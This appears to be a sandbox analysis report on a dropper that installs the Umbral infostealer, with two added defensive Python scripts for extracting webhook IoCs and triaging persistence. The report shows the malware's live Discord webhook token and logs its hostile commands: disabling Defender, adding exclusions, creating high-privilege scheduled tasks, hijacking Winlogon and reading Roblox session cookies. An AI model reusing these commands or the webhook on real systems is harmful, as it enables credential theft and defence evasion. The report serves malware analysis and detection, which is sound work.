Analysis
-
max time kernel
52s -
max time network
45s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64 arch:x86 image:win11-20240419-en locale:en-us os:windows11-21h2-x64 system -
submitted
28-05-2024 21:52
Static task
static1
Behavioral task
behavioral1
Sample
Nezure.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
Nezure.exe
Resource
win11-20240419-en
General
-
Target
Nezure.exe
-
Size
8.3MB
-
MD5
4efce9b6099fa6bfc272b5e192fe16cc
-
SHA1
d5495d7d0593a0258bb50325eb0381cec5decd19
-
SHA256
185d297d3a204b586f262ce576bc40127b6ea49561b07c7e40c0a2e779df03e1
-
SHA512
0b81846c316c3790b1d3fd88953d7c9350443d8dd34cbf4311677e5706b59f4e8b0819186f7cb81b980bab88b9aa6802170536d50a989f081b0aacb68f58ca5f
-
SSDEEP
196608:UB4vMWmmF95vrRoypY2xNS+U1kYLLBGJt4qi5Wh4d3J4jtQG0gIe:UevBn5viETxNS+5OBU4hat0gI
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1244715424420069449/GTIFnC19DnPwT_RfLQ395m4ILCbNzqdjl2fE6jLwJomWdfGuqMipwhUem4c7oUOG5y7l
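The extracted config is a single Discord webhook, which is the stealer's whole C2: stolen data is POSTed to that URL. As an added example (not part of the report and not the sandbox's or Umbral's code), the script below pulls webhook URLs out of a strings or memory dump, de-duplicates them, decodes the creation time from the webhook ID (Discord snowflakes carry milliseconds since 2015-01-01T00:00:00Z in their upper 42 bits) and emits a defanged form plus an ID-only hunt pattern. The only real value is the webhook from this report; the second URL in the sample dump, its ID and token, and the filler strings around them are constructed for the example, and the host and `/api/vN/` variants the regex accepts are assumptions based on Discord's documented webhook endpoint.

```python
"""Extract and enrich Discord webhook C2 endpoints from a strings/memory dump.

Added example, not sandbox output and not Umbral code. Only the first webhook URL
below is real (it is the one in this report's Malware Config); everything else in
SAMPLE_DUMP is constructed.
"""
import re
from datetime import datetime, timezone
from typing import Dict, List

# Discord snowflake IDs store milliseconds since 2015-01-01T00:00:00Z in their upper 42 bits.
DISCORD_EPOCH_MS = 1420070400000

# Webhook URL shapes Discord serves: discord.com / discordapp.com, optional ptb./canary.
# host prefix, optional /api/vN/ prefix. Group 1 is the numeric ID, group 2 the token.
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/(?:v\d+/)?webhooks/"
    r"(\d{17,20})/([A-Za-z0-9_-]{20,})"
)


def snowflake_time(snowflake: int) -> datetime:
    """Creation time encoded in a Discord snowflake (webhook, channel and user IDs alike)."""
    return datetime.fromtimestamp(((snowflake >> 22) + DISCORD_EPOCH_MS) / 1000, tz=timezone.utc)


def defang(url: str) -> str:
    """Share-safe form: hxxps:// scheme and bracketed dots in the host only."""
    scheme, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    return f"{scheme.replace('http', 'hxxp')}://{host.replace('.', '[.]')}/{path}"


def extract_webhooks(blob: str) -> List[Dict[str, str]]:
    """Unique webhooks in a dump, with creation time, defanged URL and a hunt pattern.

    The token is the secret, so proxy/EDR hunts key on the ID path segment and the
    full URL should only travel defanged.
    """
    seen = set()
    found: List[Dict[str, str]] = []
    for m in WEBHOOK_RE.finditer(blob):
        webhook_id, token = m.group(1), m.group(2)
        if webhook_id in seen:
            continue  # same webhook embedded more than once (dropper + unpacked payload)
        seen.add(webhook_id)
        found.append({
            "id": webhook_id,
            "token": token,
            "created_utc": snowflake_time(int(webhook_id)).strftime("%Y-%m-%d %H:%M:%S"),
            "defanged": defang(m.group(0)),
            "hunt_pattern": f"/api/webhooks/{webhook_id}/",
        })
    return found


# Constructed dump: the report's webhook twice, plus a constructed canary.discordapp.com
# variant with a made-up ID and token to exercise host handling and de-duplication.
SAMPLE_DUMP = (
    "\x00Umbral\x00https://discord.com/api/webhooks/1244715424420069449/"
    "GTIFnC19DnPwT_RfLQ395m4ILCbNzqdjl2fE6jLwJomWdfGuqMipwhUem4c7oUOG5y7l\x00"
    "System.Net.Http\x00https://discord.com/api/webhooks/1244715424420069449/"
    "GTIFnC19DnPwT_RfLQ395m4ILCbNzqdjl2fE6jLwJomWdfGuqMipwhUem4c7oUOG5y7l\x00"
    "https://canary.discordapp.com/api/v10/webhooks/1100000000000000000/"
    "constructedTokenForThisExample_0123456789abcdef\x00"
)

if __name__ == "__main__":
    for hook in extract_webhooks(SAMPLE_DUMP):
        print(hook["created_utc"], hook["defanged"], hook["hunt_pattern"])
```

For this sample the webhook ID decodes to 2024-05-27 UTC, the day before the submission date at the top of the report. Whoever holds the full URL can also remove the endpoint with an unauthenticated `DELETE` to the same path (Discord's "delete webhook with token" call), which is the usual takedown route once the IoC is confirmed.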
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule
behavioral2/memory/1108-34-0x0000023FBA770000-0x0000023FBA7B0000-memory.dmp family_umbral
behavioral2/files/0x001b00000002ab55-32.dat family_umbral -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\Videos\\MicrosoftSecurity.exe" Client.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4424 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Modifies AppInit DLL entries 2 TTPs
-
Executes dropped EXE 3 IoCs
pid Process 2084 Nezur.exe 3284 Client.exe 1108 Umbral.exe -
Loads dropped DLL 14 IoCs
pid Process
4580 Process not Found
1104 Process not Found
4092 Process not Found
832 Process not Found
2388 WmiApSrv.exe
3660 Process not Found
1644 Process not Found
4204 Process not Found
4808 Process not Found
1948 Process not Found
652 Process not Found
3060 Process not Found
4924 Process not Found
1572 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials, cookies and session tokens.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Chrome.exe" Client.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 discord.com 1 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\xdwd.dll Client.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3272 schtasks.exe 2600 schtasks.exe 3092 schtasks.exe 712 schtasks.exe 2400 schtasks.exe 1860 schtasks.exe 4696 schtasks.exe 1796 schtasks.exe 1640 schtasks.exe 1352 schtasks.exe 1968 schtasks.exe 780 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4648 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2068 PING.EXE -
Suspicious behavior: EnumeratesProcesses 37 IoCs
pid Process (count)
1108 Umbral.exe (1)
4424 powershell.exe (2)
728 powershell.exe (2)
2600 powershell.exe (2)
4236 powershell.exe (2)
2504 powershell.exe (2)
3284 Client.exe (24)
2388 WmiApSrv.exe (2) -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process
Token: SeDebugPrivilege 3284 Client.exe
Token: SeDebugPrivilege 1108 Umbral.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 2500 wmic.exe (this set of 21 was logged twice, 42 entries)
Token: SeDebugPrivilege 4424 powershell.exe
Token: SeDebugPrivilege 728 powershell.exe
Token: SeDebugPrivilege 2600 powershell.exe
Token: SeDebugPrivilege 4236 powershell.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege 3488 wmic.exe (16 entries; the listing stops at the 64-IoC mark) -
Suspicious use of WriteProcessMemory 64 IoCs
description | pid Process | procid_target
(each parent -> child pair below was logged twice; the 32 distinct pairs make up the 64 IoCs)
PID 3844 wrote to memory of 2084 | 3844 Nezure.exe | 80
PID 3844 wrote to memory of 3284 | 3844 Nezure.exe | 82
PID 3844 wrote to memory of 1108 | 3844 Nezure.exe | 83
PID 1108 wrote to memory of 2500 | 1108 Umbral.exe | 85
PID 1108 wrote to memory of 4628 | 1108 Umbral.exe | 87
PID 1108 wrote to memory of 4424 | 1108 Umbral.exe | 89
PID 1108 wrote to memory of 728 | 1108 Umbral.exe | 91
PID 1108 wrote to memory of 2600 | 1108 Umbral.exe | 93
PID 1108 wrote to memory of 4236 | 1108 Umbral.exe | 95
PID 1108 wrote to memory of 3488 | 1108 Umbral.exe | 97
PID 1108 wrote to memory of 1664 | 1108 Umbral.exe | 99
PID 1108 wrote to memory of 3956 | 1108 Umbral.exe | 101
PID 1108 wrote to memory of 2504 | 1108 Umbral.exe | 103
PID 1108 wrote to memory of 4648 | 1108 Umbral.exe | 105
PID 1108 wrote to memory of 4636 | 1108 Umbral.exe | 107
PID 4636 wrote to memory of 2068 | 4636 cmd.exe | 109
PID 3284 wrote to memory of 240 | 3284 Client.exe | 110
PID 240 wrote to memory of 712 | 240 CMD.exe | 112
PID 3284 wrote to memory of 2636 | 3284 Client.exe | 113
PID 2636 wrote to memory of 2400 | 2636 CMD.exe | 115
PID 3284 wrote to memory of 780 | 3284 Client.exe | 116
PID 780 wrote to memory of 1860 | 780 CMD.exe | 118
PID 3284 wrote to memory of 776 | 3284 Client.exe | 121
PID 776 wrote to memory of 4696 | 776 CMD.exe | 123
PID 3284 wrote to memory of 4444 | 3284 Client.exe | 126
PID 4444 wrote to memory of 1796 | 4444 CMD.exe | 128
PID 3284 wrote to memory of 2944 | 3284 Client.exe | 129
PID 2944 wrote to memory of 3272 | 2944 CMD.exe | 131
PID 3284 wrote to memory of 3416 | 3284 Client.exe | 132
PID 3416 wrote to memory of 2600 | 3416 CMD.exe | 134
PID 3284 wrote to memory of 2336 | 3284 Client.exe | 135
PID 2336 wrote to memory of 3092 | 2336 CMD.exe | 137 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4628 attrib.exe
Processes
-
[1] C:\Users\Admin\AppData\Local\Temp\Nezure.exe (PID 3844)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Nezure.exe"
    - Suspicious use of WriteProcessMemory
    [2] C:\Users\Admin\AppData\Local\Temp\Nezur.exe (PID 2084)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Nezur.exe"
        - Executes dropped EXE
    [2] C:\Users\Admin\AppData\Local\Temp\Client.exe (PID 3284)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        - Modifies WinLogon for persistence
        - Executes dropped EXE
        - Adds Run key to start application
        - Drops file in Windows directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\SYSTEM32\CMD.exe (PID 240)
            cmdline: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Ableton Live" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" & exit
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\schtasks.exe (PID 712)
                cmdline: SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Ableton Live" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe"
                - Creates scheduled task(s)
        [3] C:\Windows\SYSTEM32\CMD.exe (PID 2636)
            cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\schtasks.exe (PID 2400)
                cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
                - Creates scheduled task(s)
        [3] C:\Windows\SYSTEM32\CMD.exe (PID 780)
            cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Adobe Premiere Pro" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Chrome.exe" /RL HIGHEST & exit
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\schtasks.exe (PID 1860)
                cmdline: SchTaSKs /create /f /sc minute /mo 5 /tn "Adobe Premiere Pro" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Chrome.exe" /RL HIGHEST
                - Creates scheduled task(s)
        [3] C:\Windows\SYSTEM32\CMD.exe (PID 776)
            cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\schtasks.exe (PID 4696)
                cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
                - Creates scheduled task(s)
        [3] C:\Windows\SYSTEM32\CMD.exe (PID 4444)
            cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\schtasks.exe (PID 1796)
                cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
                - Creates scheduled task(s)
        [3] C:\Windows\SYSTEM32\CMD.exe (PID 2944)
            cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\schtasks.exe (PID 3272)
                cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
                - Creates scheduled task(s)
        [3] C:\Windows\SYSTEM32\CMD.exe (PID 3416)
            cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\schtasks.exe (PID 2600)
                cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
                - Creates scheduled task(s)
        [3] C:\Windows\SYSTEM32\CMD.exe (PID 2336)
            cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\schtasks.exe (PID 3092)
                cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
                - Creates scheduled task(s)
        [3] C:\Windows\SYSTEM32\CMD.exe (PID 3012)
            cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
            [4] C:\Windows\system32\schtasks.exe (PID 1640)
                cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
                - Creates scheduled task(s)
        [3] C:\Windows\SYSTEM32\CMD.exe (PID 1680)
            cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
            [4] C:\Windows\system32\schtasks.exe (PID 1968)
                cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
                - Creates scheduled task(s)
        [3] C:\Windows\SYSTEM32\CMD.exe (PID 1284)
            cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
            [4] C:\Windows\system32\schtasks.exe (PID 780)
                cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
                - Creates scheduled task(s)
        [3] C:\Windows\SYSTEM32\CMD.exe (PID 1764)
            cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
            [4] C:\Windows\system32\schtasks.exe (PID 1352)
                cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
                - Creates scheduled task(s)
    [2] C:\Users\Admin\AppData\Local\Temp\Umbral.exe (PID 1108)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\System32\Wbem\wmic.exe (PID 2500)
            cmdline: "wmic.exe" csproduct get uuid
            - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\SYSTEM32\attrib.exe (PID 4628)
            cmdline: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
            - Views/modifies file attributes
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4424)
            cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 728)
            cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2600)
            cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4236)
            cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            (HKLN: is reproduced as observed; PowerShell has no drive of that name, so this lookup fails rather than reading HKLM)
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\System32\Wbem\wmic.exe (PID 3488)
            cmdline: "wmic.exe" os get Caption
            - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\System32\Wbem\wmic.exe (PID 1664)
            cmdline: "wmic.exe" computersystem get totalphysicalmemory
        [3] C:\Windows\System32\Wbem\wmic.exe (PID 3956)
            cmdline: "wmic.exe" csproduct get uuid
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2504)
            cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            - Suspicious behavior: EnumeratesProcesses
        [3] C:\Windows\System32\Wbem\wmic.exe (PID 4648)
            cmdline: "wmic" path win32_VideoController get name
            - Detects videocard installed
        [3] C:\Windows\SYSTEM32\cmd.exe (PID 4636)
            cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\PING.EXE (PID 2068)
                cmdline: ping localhost
                - Runs ping.exe
[1] C:\Windows\system32\wbem\WmiApSrv.exe (PID 2388)
    cmdline: C:\Windows\system32\wbem\WmiApSrv.exe
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
Note: PIDs are reused within this run (780 is both a CMD.exe and a later schtasks.exe; 2600 is both a powershell.exe and a later schtasks.exe), so correlate the signature tables above on PID plus image name, not PID alone.
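The Winlogon Userinit write, the Run key, the mixed-case `SchTaSKs /CrEAte` lines and the `Set-MpPreference`/`Add-MpPreference` calls above are the artifacts a responder would hunt for on other hosts. The following is an added example (not sandbox output and not Umbral's code) that encodes those checks as rules and runs them over events constructed by hand from this report's command lines and registry writes, plus two benign controls; the event schema, the list of user-writable directories and the rule wording are assumptions of the example. It also flags the `/mo -1` modifier, which is outside the 1-1439 range schtasks documents for `/sc minute`; the report shows those invocations but not whether schtasks accepted them, so the only XAMPP-style tasks worth assuming succeeded are the `ONLOGON` and `/mo 5` ones.

```python
"""Triage rules for the persistence and Defender-tampering artifacts in the run above.

Added example, not sandbox output and not Umbral code. EVENTS is constructed by hand
from the command lines and registry writes in this report; nothing here touches a live host.
"""
import re
from typing import Dict, List

# Stock Userinit value. winlogon.exe runs every comma-separated entry at logon, so an
# appended path is persistence (ATT&CK T1547.004, Winlogon Helper DLL).
DEFAULT_USERINIT = {r"c:\windows\system32\userinit.exe", r"%windir%\system32\userinit.exe"}

# Locations a non-admin user can write to (assumed list). An autorun or /rl HIGHEST task
# whose target lives here is far more suspicious than one under Program Files.
USER_WRITABLE = re.compile(r"(^|\\)(users|appdata|temp|tmp|programdata|public)(\\|$)", re.I)

# Windows-style tokenizer: keep double-quoted arguments as one token.
TOKEN = re.compile(r'"([^"]*)"|(\S+)')

# Set-/Add-MpPreference switches that weaken Defender, as used by this sample.
DEFENDER_TAMPER = re.compile(
    r"-(Disable\w+)\s+\$true"
    r"|-(EnableControlledFolderAccess)\s+Disabled"
    r"|-(EnableNetworkProtection)\s+(?:Disabled|AuditMode)"
    r"|-(MAPSReporting)\s+Disabled"
    r"|-(SubmitSamplesConsent)\s+(?:NeverSend|2)\b"
    r"|-(Exclusion(?:Path|Process|Extension))\s",
    re.I,
)


def userinit_extra_entries(data: str) -> List[str]:
    """Every Userinit entry that is not the stock userinit.exe."""
    entries = [e.strip() for e in data.split(",") if e.strip()]
    return [e for e in entries if e.lower() not in DEFAULT_USERINIT]


def is_user_writable(path: str) -> bool:
    return bool(USER_WRITABLE.search(path))


def parse_schtasks(cmdline: str) -> Dict[str, str]:
    """Map lower-cased /switches to their values. schtasks accepts any casing, which is
    why the sample writes 'SchTaSKs /CrEAte' to dodge naive string matches."""
    tokens = [quoted or bare for quoted, bare in TOKEN.findall(cmdline)]
    flags: Dict[str, str] = {}
    i = 1  # tokens[0] is the schtasks image itself
    while i < len(tokens):
        if tokens[i].startswith("/"):
            has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("/")
            flags[tokens[i][1:].lower()] = tokens[i + 1] if has_value else ""
            i += 2 if has_value else 1
        else:
            i += 1
    return flags


def schtasks_findings(cmdline: str) -> List[str]:
    """Why a 'schtasks /create' looks like malware persistence (ATT&CK T1053.005)."""
    f = parse_schtasks(cmdline)
    if "create" not in f:
        return []
    findings: List[str] = []
    target, name = f.get("tr", ""), f.get("tn", "")
    if f.get("rl", "").lower() == "highest" and is_user_writable(target):
        findings.append(f"/rl HIGHEST task {name!r} runs user-writable {target}")
    if f.get("sc", "").lower() == "minute":
        mo = f.get("mo", "1")
        # schtasks documents 1-1439 for /sc minute; the report's XAMPP tasks pass -1.
        if not (mo.isdigit() and 1 <= int(mo) <= 1439):
            findings.append(f"/sc minute with out-of-range /mo {mo} on task {name!r}")
    return findings


def defender_tamper(cmdline: str) -> List[str]:
    """Names of the Set-/Add-MpPreference switches that weaken Defender."""
    if not re.search(r"\b(?:Set|Add)-MpPreference\b", cmdline, re.I):
        return []
    return [next(g for g in m.groups() if g) for m in DEFENDER_TAMPER.finditer(cmdline)]


def triage(events: List[Dict[str, str]]) -> List[str]:
    """Run every rule over registry-set and process-create events (assumed schema)."""
    findings: List[str] = []
    for ev in events:
        if ev["type"] == "reg_set":
            if ev["value"].lower() == "userinit":
                findings += [f"Winlogon Userinit hijack -> {p}" for p in userinit_extra_entries(ev["data"])]
            elif ev["key"].lower().endswith(r"\currentversion\run") and is_user_writable(ev["data"]):
                findings.append(f"Run key {ev['value']!r} -> user-writable {ev['data']}")
        elif ev["image"].lower().endswith("schtasks.exe"):
            findings += schtasks_findings(ev["cmdline"])
        elif ev["image"].lower().endswith("powershell.exe"):
            findings += [f"Defender tamper: -{s}" for s in defender_tamper(ev["cmdline"])]
    return findings


# Constructed events mirroring this report's IoCs, followed by two benign controls.
EVENTS: List[Dict[str, str]] = [
    {"type": "reg_set", "key": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "value": "Userinit",
     "data": r"C:\Windows\System32\userinit.exe,C:\Users\Admin\Videos\MicrosoftSecurity.exe"},
    {"type": "reg_set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "value": "svchost",
     "data": r"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Chrome.exe"},
    {"type": "proc", "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Ableton Live" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe"'},
    {"type": "proc", "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST'},
    {"type": "proc", "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'SchTaSKs /create /f /sc minute /mo 5 /tn "Adobe Premiere Pro" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Chrome.exe" /RL HIGHEST'},
    {"type": "proc", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'"},
    {"type": "proc", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true "
                r"-DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled "
                r"-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend "
                r"&& powershell Set-MpPreference -SubmitSamplesConsent 2"},
    # Benign controls (constructed): stock Userinit value and an admin-owned daily task.
    {"type": "reg_set", "key": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "value": "Userinit",
     "data": r"C:\Windows\System32\userinit.exe,"},
    {"type": "proc", "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "Nightly Backup" /tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00'},
]

if __name__ == "__main__":
    for line in triage(EVENTS):
        print(line)
```

Against the constructed events the rules return sixteen findings: the Userinit hijack, the Run key pointing into INetCookies, one per `/rl HIGHEST` task rooted under the user profile (two of the XAMPP lines also trip the out-of-range `/mo`), the exclusion added for Umbral.exe, and nine individual Defender switches from the single `Set-MpPreference` line; the two controls produce nothing. The `SchTaSKs` parser is the part worth reusing: matching on the lower-cased switch name rather than the raw string is what keeps the mixed-case evasion from working.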
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (3)
    Registry Run Keys / Startup Folder (2)
    Winlogon Helper DLL (1)
  Scheduled Task/Job (1)
Privilege Escalation
  Boot or Logon Autostart Execution (3)
    Registry Run Keys / Startup Folder (2)
    Winlogon Helper DLL (1)
  Scheduled Task/Job (1)
Downloads
-
Filesize 2KB
